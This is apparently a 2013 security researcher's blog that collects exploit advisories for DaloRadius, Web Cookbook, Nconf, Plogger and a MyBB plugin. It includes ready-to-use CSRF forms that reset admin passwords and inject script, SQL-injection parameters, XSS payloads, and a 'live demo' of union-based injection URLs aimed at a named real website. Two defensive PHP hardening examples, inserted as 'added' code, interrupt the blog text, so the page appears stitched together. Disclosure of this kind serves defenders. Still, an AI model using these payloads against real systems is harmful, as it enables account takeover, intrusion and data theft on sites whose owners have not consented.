
#IndependentPakistaniSecurityResearcher


DaloRadius CSRF / XSS / SQL Injection

Posted by Saadi On Saturday 16 March 2013 2 comments
Hi, just browsing SourceForge and saw a script having more than a thousand downloads per week, so not bad to give it a pentest, and found some stuff in it :)

Exploit Links

http://www.exploit-db.com/exploits/24849

http://1337day.com/exploit/20513

http://packetstormsecurity.com/files/120828/DaloRadius-CSRF-XSS-SQL-Injection.html

Exploit

-------------------------------------------------------------------------
# Software      : DaloRadius    SQLi / CSRF / XSS
# Author        : Saadat Ullah , saadi_linux@rocketmail.com
# Author home   : http://security-geeks.blogspot.com
# Date          : 15/3/13
# Vendors       : http://www.daloradius.com/
# Download Link : http://sourceforge.net/projects/daloradius/
                                                                                     
-------------------------------------------------------------------------
+---+[ CSRF Change Admin Password ]+---+

DaloRadius is not using any security tokens to protect against CSRF. It is vulnerable to CSRF on all locations.
Some of them:
Change Admin Password

<form action="daloradius/config-operators-edit.php" method="post">
  <input type="hidden" value="administrator" name="operator_username" />
  <div class="tabber">
    <div class="tabbertab" title="Operator Info">
      <fieldset>
        <label for="password" class="form"></label>
        <input name="password" id="password" type="hidden" value="radius1" tabindex="101" />
        <br/><br/>
        <hr><br/>
        <input type="submit" name="submit" value="Apply" class="button" />
      </fieldset>
    </div>
  </div>
</form>

Poc
Header
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost/daloradius/config-operators-edit.php?operator_username=administrator
Cookie: PHPSESSID=5f528764d624db129645be2e9
Content-Type: application/x-www-form-urlencoded
Content-Length: 3540

Post Data:
operator_username=administrator&password=radius1&submit=Apply

+---+[ SQL Injection ]+---+

There are multiple SQLi in the script; some are:
http://localhost/daloradius/acct-ipaddress.php?orderBy=[SQLi]
http://localhost/daloradius/acct-ipaddress.php?ipaddress=[SQLi]
http://localhost/daloradius/acct-date.php?orderBy=[SQLi]
http://localhost/daloradius/acct-date.php?username=[SQLi] etc

Proof Of Concept
in acct-ipaddress.php

isset($_GET['orderBy']) ? $orderBy = $_GET['orderBy'] : $orderBy = "radacctid";
  isset($_GET['orderType']) ? $orderType = $_GET['orderType'] : $orderType = "asc";  


  isset($_GET['ipaddress']) ? $ipaddress = $_GET['ipaddress'] : $ipaddress = "";

  .
  .
  .
 $sql = "SELECT ".$configValues['CONFIG_DB_TBL_RADACCT'].".RadAcctId, ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS'].".name as hotspot, ".$configValues['CONFIG_DB_TBL_RADACCT'].".UserName, radacct.FramedIPAddress, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctStartTime, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctStopTime, radacct.AcctSessionTime, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctInputOctets, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctOutputOctets, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctTerminateCause, ".$configValues['CONFIG_DB_TBL_RADACCT'].".NASIPAddress FROM ".$configValues['CONFIG_DB_TBL_RADACCT']." LEFT JOIN ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS']." ON ".$configValues['CONFIG_DB_TBL_RADACCT'].".calledstationid = ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS'].".mac WHERE FramedIPAddress='$ipaddress';";


In acct-date.php
if ( (isset($_GET['username'])) && ($_GET['username']) ) {
    $username = $_GET['username'];



  $sql = "SELECT ".$configValues['CONFIG_DB_TBL_RADACCT'].".RadAcctId, ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS'].".name as hotspot, ".$configValues['CONFIG_DB_TBL_RADACCT'].".UserName, ".$configValues['CONFIG_DB_TBL_RADACCT'].".FramedIPAddress, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctStartTime, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctStopTime, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctSessionTime, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctInputOctets, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctOutputOctets, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctTerminateCause, ".$configValues['CONFIG_DB_TBL_RADACCT'].".NASIPAddress FROM ".$configValues['CONFIG_DB_TBL_RADACCT']." LEFT JOIN ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS']." ON ".$configValues['CONFIG_DB_TBL_RADACCT'].".calledstationid = ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS'].".mac WHERE AcctStartTime>'$startdate' and AcctStartTime<'$enddate' and UserName like '$username';";
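The two daloRADIUS queries above mix three different kinds of untrusted input, and a prepared statement only handles one of them: ipaddress, username and the dates are values and can be bound, but orderBy and orderType are SQL identifiers and keywords, which no driver will bind, and a value used inside a LIKE pattern keeps its wildcard meaning even when bound. The following is an added example, not daloRADIUS, Web Cookbook or Plogger code, that treats each kind accordingly: identifiers go through an allow-list, LIKE input has its wildcards escaped, and a LIMIT count (the Plogger entries_per_page case further down this page) is bounded to an integer. The table name is assumed to come from configuration, as $configValues does above, and is treated as trusted; SQLite stands in for MySQL so the file runs stand-alone.

```php
<?php
// Added example, not daloRADIUS, Web Cookbook or Plogger code. The table name is
// assumed to come from configuration (as $configValues does in the advisory) and
// is treated as trusted; everything taken from $_GET is validated or bound.
declare(strict_types=1);

const ORDER_COLUMNS = ['radacctid', 'username', 'acctstarttime', 'acctstoptime', 'framedipaddress'];

/** Return the raw value only if it is a string, else an empty string. */
function asString($v): string
{
    return is_string($v) ? $v : '';
}

/** ORDER BY column: identifiers cannot be bound, so they are allow-listed. */
function safeOrderBy($raw, string $default = 'radacctid'): string
{
    $candidate = strtolower(asString($raw));
    return in_array($candidate, ORDER_COLUMNS, true) ? $candidate : $default;
}

/** Sort direction: exactly two tokens are possible. */
function safeOrderType($raw): string
{
    return strtolower(asString($raw)) === 'desc' ? 'DESC' : 'ASC';
}

/** LIMIT count (cf. Plogger's entries_per_page): a bounded positive integer or the default. */
function safeLimit($raw, int $default = 20, int $max = 500): int
{
    $n = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1, 'max_range' => $max]]);
    return $n === false ? $default : $n;
}

/**
 * LIKE patterns: binding the value stops injection, but "%" and "_" would still
 * act as wildcards inside the pattern, so they are escaped with "!" and the
 * query declares ESCAPE '!' (portable across MySQL and SQLite).
 */
function likeLiteral(string $value): string
{
    return str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $value);
}

/** Build the accounting query: untrusted identifiers validated, untrusted values bound. */
function buildAcctQuery(array $get, string $radacctTable): array
{
    $orderBy   = safeOrderBy($get['orderBy'] ?? null);
    $orderType = safeOrderType($get['orderType'] ?? null);
    $limit     = safeLimit($get['limit'] ?? null);
    $params = [
        ':ip'   => asString($get['ipaddress'] ?? null),
        ':user' => likeLiteral(asString($get['username'] ?? null)) . '%',   // prefix search
    ];
    $sql = 'SELECT r.RadAcctId, r.UserName, r.FramedIPAddress, r.AcctStartTime'
         . " FROM $radacctTable r"
         . " WHERE r.FramedIPAddress = :ip AND r.UserName LIKE :user ESCAPE '!'"
         . " ORDER BY r.$orderBy $orderType LIMIT $limit";
    return [$sql, $params];
}

// Constructed demonstration on an in-memory SQLite database (needs pdo_sqlite).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE radacct (RadAcctId INTEGER, UserName TEXT, FramedIPAddress TEXT, AcctStartTime TEXT)');
$pdo->exec("INSERT INTO radacct VALUES (1, 'bob', '10.0.0.5', '2013-03-15'), (2, 'bob_2', '10.0.0.5', '2013-03-16')");

// The advisory's probe values: the orderBy payload falls back to the default
// column, the quote in ipaddress is bound as data, and a bare "%" username
// matches only a literal percent sign, so nothing matches.
[$sql, $params] = buildAcctQuery(
    ['orderBy' => "radacctid'; DROP TABLE radacct--", 'ipaddress' => "10.0.0.5' OR '1'='1", 'username' => '%'],
    'radacct'
);
$stmt = $pdo->prepare($sql);
$stmt->execute($params);
var_dump(count($stmt->fetchAll(PDO::FETCH_ASSOC)));

// A legitimate lookup: "bob_" is a literal prefix, so only bob_2 qualifies.
[$sql, $params] = buildAcctQuery(['ipaddress' => '10.0.0.5', 'username' => 'bob_', 'orderType' => 'desc'], 'radacct');
$stmt = $pdo->prepare($sql);
$stmt->execute($params);
var_dump(array_column($stmt->fetchAll(PDO::FETCH_ASSOC), 'UserName'));
```

The Web Cookbook searchRecipe() query later on this page is the same LIKE case: binding $sstring is necessary, and likeLiteral() on it is what keeps a submitted "%" from matching every recipe.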



+---+[ XSS ]+---+
http://localhost/daloradius/rep-logs-daloradius.php?daloradiusLineCount=50&daloradiusFilter=<script>alert(document.cookie);</script>
http://localhost/daloradius/mng-search.php?username=<script>alert(document.cookie);</script>

#Independent Pakistani Security Researcher

Web Cookbook SQL Injection / XSS

Posted by Saadi On Tuesday 12 March 2013 1 comments
Exploit Links: 

http://www.exploit-db.com/exploits/24742/

http://packetstormsecurity.com/files/120760/Web-Cookbook-SQL-Injection.html

http://1337day.com/exploit/20501

Exploit

# Exploit Title: Web Cookbook Multiple SQL Injection
# Date: 2013/3/12
# Exploit Author: Saadat Ullah , saadi_linux@rocketmail.com
# Software Link: http://sourceforge.net/projects/webcookbook/
# Author HomePage: http://security-geeks.blogspot.com/
# Tested on: Server: Apache/2.2.15 (Centos) PHP/5.3.3

# SQL Injection

http://localhost/cook/searchrecipe.php?sstring=[SQLi]
http://localhost/cook/showtext.php?mode=[SQLi]
http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient=


http://localhost/cook/showtext.php?mode=[SQLi]
#Proof Of Concept
In showtext.php
Code:
$mode = $_GET["mode"];
.
.
showText($mode, $art);//sending $mode to a function without sanitizing it
.
.
function showText($kategorie, $art) {
initDB();
echo "<div class=\"rdisplay\">\n";
$query = "SELECT * FROM dat_texte WHERE id = $kategorie"; //using an unsanitized field in the query
$result = mysql_query($query);
.
.
All GET fields are vulnerable to SQLi
http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient=
#p0c
In searchrecipe.php
$title = $_GET['title'];
$prefix = $_GET['prefix'];
$preparation = $_GET['preparation'];
$postfix = $_GET['postfix'];
$tipp = $_GET['tipp'];
$ingredient = $_GET['ingredient'];
.
.
.
if ($title != "") {
$sstring = "a.title LIKE '%$title%' ";
}
.
.
searchRecipe($mode, $sstring);
.
.
In Function SearchRecipe
$query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title";


http://localhost/cook/searchrecipe.php?sstring=[SQLi]
P0c
$sstring = $_GET['sstring'];
if ($sstring != "") {
searchRecipe(0, $sstring);
.
.
.
$query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title";


A simple non-persistent XSS
http://localhost/cook/searchrecipe.php?mode=1&title=<script>alert('hi');</script>&prefix=&preparation=&postfix=&tipp=&ingredient=


#Independent Pakistani Security Researcher

Exploit Live Demo
kochen.joachim-gabel.de/showtext.php?mode=603' [Union Based Injection]

Database Name:
db394647325

http://www.kochen.joachim-gabel.de/showtext.php?mode=-603%20union%20select%201,2,table_name,4,5%20from%20information_schema.tables%20where%20table_schema=database%28%29--

 http://www.kochen.joachim-gabel.de/showtext.php?mode=-603%20union%20select%201,2,database%28%29,4,5--
etc...

Nconf 1.3 SQL Injection / Cross Site Scripting Vulnerabilities

Posted by Saadi On Monday 4 March 2013 1 comments
Hi, today Nconf v1.3. Ahh, the script is highly insecure, so I just reported a few of them..
Exploit Links:
http://1337day.com/exploit/20475
http://packetstormsecurity.com/files/120628/Nconf-1.3-SQL-Injection-Cross-Site-Scripting.html

# Exploit Title: nconf handle_item.php,Modify_attr.php etc Multiple Sql injection
# Date: 2013/3/4
# Exploit Author: Saadat Ullah,saadi_linux@rocketmail.com
# Software Link: http://sourceforge.net/projects/nconf/files/nconf/
# Vendors: http://www.nconf.org/
# Author HomePage: http://security-geeks.blogspot.com/
# Version: nconf 1.3
# Tested on: Server: Apache/2.2.15 (Centos) PHP/5.3.3

Nconf is vulnerable to SQL injection in most of its files; they didn't sanitize any GET/POST fields.
Some of them are:

Blind SQLi in handle_item.php on the id parameter
handle_item.php?id=1'
PoC:
$query2 .= ' AND id_item <> '.$_GET["id"];

delete_attr.php, POST data:
id=15'&name=&delete=yes&submit=Delete
PoC, id via GET field:
$query = 'SELECT attr_name, config_class FROM ConfigAttrs, ConfigClasses WHERE id_attr='.$_GET["id"].' AND fk_id_class=ConfigClasses.id_class';

and id via POST field:
$query = 'DELETE FROM ConfigAttrs WHERE id_attr='.$_POST["id"];

clone_host_write2db.php: again on the id parameter. There are many more...

A simple reflected XSS

http://localhost/nconf/handle_item.php?item=XSS Vector
PoC:
$item_class = $_GET["item"];
.
.
echoed without sanitization:
echo ''.ucfirst($handle_action).' '.$item_class.'';

A local path disclosure
http://localhost/nconf/call_file.php?ajax_file=service_list.php&debug=yes
Post Data: host_id=5372&highlight_service=5373&class=a

#Independent Pakistani Security Researcher

Plogger Gallery RC 1 Multiple Vuln [SQLI-XSS-CRSF]

Posted by Saadi On Sunday 3 March 2013 1 comments
Hi, 2 days back my friend needed a CMS for an image gallery, so after finding one I pentested the script and found it highly insecure. The complete exploit can be viewed here:
1337day: http://1337day.com/exploit/20470
PacketStorm: http://packetstormsecurity.com/files/120619/PloggerGallery-1.0-RC1-CSRF-XSS-SQL-Injection.html

PoC
-------------------------------------------------------------------------
# Software      : PloggerGallery Version 1.0 RC1
# Author        : Saadat Ullah
# Date          : 2/3/13
# Dork          : Use Ur Mind
# Software Link : http://www.plogger.org/download/
-------------------------------------------------------------------------
+---+[ Feedback.php Sqli ]+---+

Injectable on the entries_per_page parameter in feedback.php

http://localhost/plogger/plog-admin/plog-feedback.php?entries_per_page=5'

p0c

if (isset($_REQUEST['entries_per_page'])) {
$_SESSION['entries_per_page'] = $_REQUEST['entries_per_page'];
} else if (!isset($_SESSION['entries_per_page'])) {
$_SESSION['entries_per_page'] = 20;
}
.
.
.
$limit = "LIMIT ".$first_item.", ".$_SESSION['entries_per_page'];
.
.

// Generate javascript init function for ajax editing
$query = "SELECT *, UNIX_TIMESTAMP(`date`) AS `date` from ".PLOGGER_TABLE_PREFIX."comments WHERE `approved` = ".$approved." ORDER BY `id` DESC ".$limit;
$result = run_query($query);

+---+[ CSRF In Admin Panel ]+---+

Plogger is not using any parameter or security token to protect against CSRF, so it is vulnerable to CSRF at all locations inside the admin panel.

+---+[ XSS ]+---+

There are multiple XSS in Plogger, like editing a comment inside the admin panel: the comments are filtered for a normal user but not for the admin.
And as it is vulnerable to CSRF everywhere, we can edit a comment via CSRF and change it to any XSS vector.
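Both the Plogger admin-panel XSS just described and the nconf handle_item.php finding earlier on this page come from printing request or database data raw. The fix is the same in both cases and does not depend on who is logged in: encode at output time. The following is an added example, not code from either project; the helper names and the constructed sample comment are assumptions.

```php
<?php
// Added example, not Plogger's or nconf's code: contextual output encoding.
// Helper names and the sample data are assumptions.
declare(strict_types=1);

/** Encode for an HTML text node or a double-quoted attribute value. */
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Edit-comment form: every dynamic value goes through e(), admin or not. */
function render_edit_comment_form(array $comment): string
{
    return '<form action="plog-feedback.php" method="post">'
         . '<input name="author" value="' . e($comment['author']) . '">'
         . '<input name="email" value="' . e($comment['email']) . '">'
         . '<textarea name="comment">' . e($comment['comment']) . '</textarea>'
         . '<input type="hidden" name="pid" value="' . (int) $comment['pid'] . '">'
         . '<input type="hidden" name="action" value="update-comment">'
         . '<input type="submit" name="update" value="Update">'
         . '</form>';
}

/** The nconf-style heading, with the user-controlled item name encoded. */
function render_item_heading(string $action, string $item_class): string
{
    return '<h2>' . e(ucfirst($action)) . ' ' . e($item_class) . '</h2>';
}

// Constructed sample: a stored comment carrying the payload from the advisory.
$sample = [
    'pid'     => 4,
    'author'  => "<script>alert('Hi');</script>",
    'email'   => 'asdf@localhost.com',
    'comment' => "<script>alert('Hi');</script>",
];
echo render_edit_comment_form($sample), PHP_EOL;

// The same for the GET parameter nconf echoes; non-string input is dropped.
$item = $_GET['item'] ?? "<script>alert('Hi');</script>";
echo render_item_heading('edit', is_string($item) ? $item : ''), PHP_EOL;
```

The browser receives `&lt;script&gt;alert(&#039;Hi&#039;);&lt;/script&gt;` and shows it as text. Filtering on input, which Plogger does for normal users only, is not a substitute: the same stored value is rendered on several pages by several roles, and only the renderer knows the output context.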

XSS
http://localhost/plogger/plog-admin/plog-feedback.php
Edit a comment with any XSS vector, or just do it via CSRF.


Upload a file and set its name to any XSS vector.

http://localhost/plogger/plog-admin/plog-upload.php

It can be exploited in many ways, like
CSRF + SQLi inside the admin panel, which is described above.

XSS in Edit Comment: CSRF + XSS

<html>
<body>
<form class="edit width-700" action="http://localhost/plogger/plog-admin/plog-feedback.php" method="post">
<div style="float: right;"><img src="http://localhost/plogger/plog-content/thumbs/plogger-test-collection/plogger-test-album/small/123.png" alt="" /></div>
<div>
<div class="strong">Edit Comment</div>
<p>
<label class="strong" accesskey="a" for="author">Author:</label><br />
<input size="65" name="author" id="author" value="<script>alert('Hi');</script>" type="hidden"/>
</p>
<p>
<label class="strong" accesskey="e" for="email">Email:</label><br />
<input size="65" name="email" id="email" value="asdf@localhost.com" type="hidden"/>
</p>
<p>
<label class="strong" accesskey="u" for="url">Website:</label><br />
<input size="65" name="url" id="url" value="http://adsf.com" type="hidden"/>
</p>
<p>
<label class="strong" accesskey="c" for="comment">Comment:</label><br />
<textarea cols="62" rows="4" name="comment" id="comment"><script>alert('Hi');</script></textarea>
</p>
<input type="hidden" name="pid" value="4" />
<input type="hidden" name="action" value="update-comment" />
<input class="submit" name="update" value="Update" type="submit" />
<input class="submit-cancel" name="cancel" value="Cancel" type="submit" />
</div>
</form>
</body>
</html>


Another XSS
http://localhost/plogger/plog-admin/plog-manage.php?action=edit-picture&id=1
Edit the caption to an XSS vector inside the admin panel.
Again CSRF + XSS:
<form class="edit width-700" action="http://localhost/plogger/plog-admin/plog-manage.php?level=pictures&id=1" method="post">
<div style="float: right;"><img src="http://localhost/plogger/plog-content/thumbs/plogger-test-collection/plogger-test-album/small/123.png" alt="" /></div>
<div>
<div class="strong">Edit Image Properties</div>
<p>
<label class="strong" accesskey="c" for="caption"><em>C</em>aption:</label><br />
<input size="62" name="caption" id="caption" value="<script>alert(document.cookie);</script>" type="hidden"/>
</p>
<p>
<label class="strong" for="description">Description:</label><br />
<textarea name="description" id="description" cols="60" rows="5"><script>alert(document.cookie);</script></textarea>
</p>
<p><input type="checkbox" id="allow_comments" name="allow_comments" value="1" checked="checked" /><label class="strong" for="allow_comments" accesskey="w">Allo<em>w</em> Comments?</label></p>
<input type="hidden" name="pid" value="1" />
<input type="hidden" name="action" value="update-picture" />
<input class="submit" name="update" value="Update" type="submit" />
<input class="submit-cancel" name="cancel" value="Cancel" type="submit" />
</div>
</form>


CSRF admin password reset and XSS

plog-options.php

<form action="http://localhost/plogger/plog-admin/plog-options.php" method="post">
<table class="option-table" cellspacing="0">
<tbody><tr class="alt">
<td class="left"><label for="admin_username"></label></td>
<td class="right"><input size="40" id="admin_username" name="admin_username" value="admin" type="hidden"></td>
</tr>
<tr>
<td class="left"><label for="admin_email"></label></td>
<td class="right"><input size="40" id="admin_email" name="admin_email" value="localhost@hotmail.com" type="hidden"></td>
</tr>
<tr class="alt">
<td class="left"><label for="admin_password"></label></td>
<td class="right"><input size="40" id="admin_password" name="admin_password" value="123456789" type="hidden"></td>
</tr>
<tr>
<td class="left"><label for="confirm_admin_password"></label></td>
<td class="right"><input size="40" id="confirm_admin_password" name="confirm_admin_password" value="123456789" type="hidden"></td>
</tr>
<tr class="alt">
<td class="left"><label for="gallery_url"></label></td>
<td class="right"><input size="40" id="gallery_url" name="gallery_url" value="<script>alert('hi');</script>" type="hidden"/></td>
</tr>
<tr>
<td class="right"><input class="submit" name="submit" value="DOne" type="submit"></td>
</tr>
</tbody></table>
</form>

--------------------------------------------------------
# Email - saadi_linux@rocketmail.com
# GreeTz 2 All Pakistani Security Researchers
# Home - http://security-geeks.blogspot.com
---------------------------------------------------------

Mybb Plugin PRO STAT [SQLI]

Posted by Saadi On Saturday 2 March 2013 3 comments
I was working on some MyBB plugins and found some vulns in them..
So for now, PRO STAT.

Vendors: http://prostats.wordpress.com

Pro Stat is a well-known MyBB plugin and is vulnerable to SQL injection inside the admin panel and change viewer.
It's not much exploitable because you need admin logins, but it can be handy for dumping the DB if you failed to shell it ;)

Okay, here:

Go to Plugins and just inject the num rows setting..
It's vulnerable on most of the parameters inside settings,
like the POST field ps_num_rows etc.

Screen Shot

My Updates

Posted by Saadi On 1 comments
Salam, I was thinking of making a blog for my security findings and updates, so all my security updates are gonna come here.. Cheers, Saadi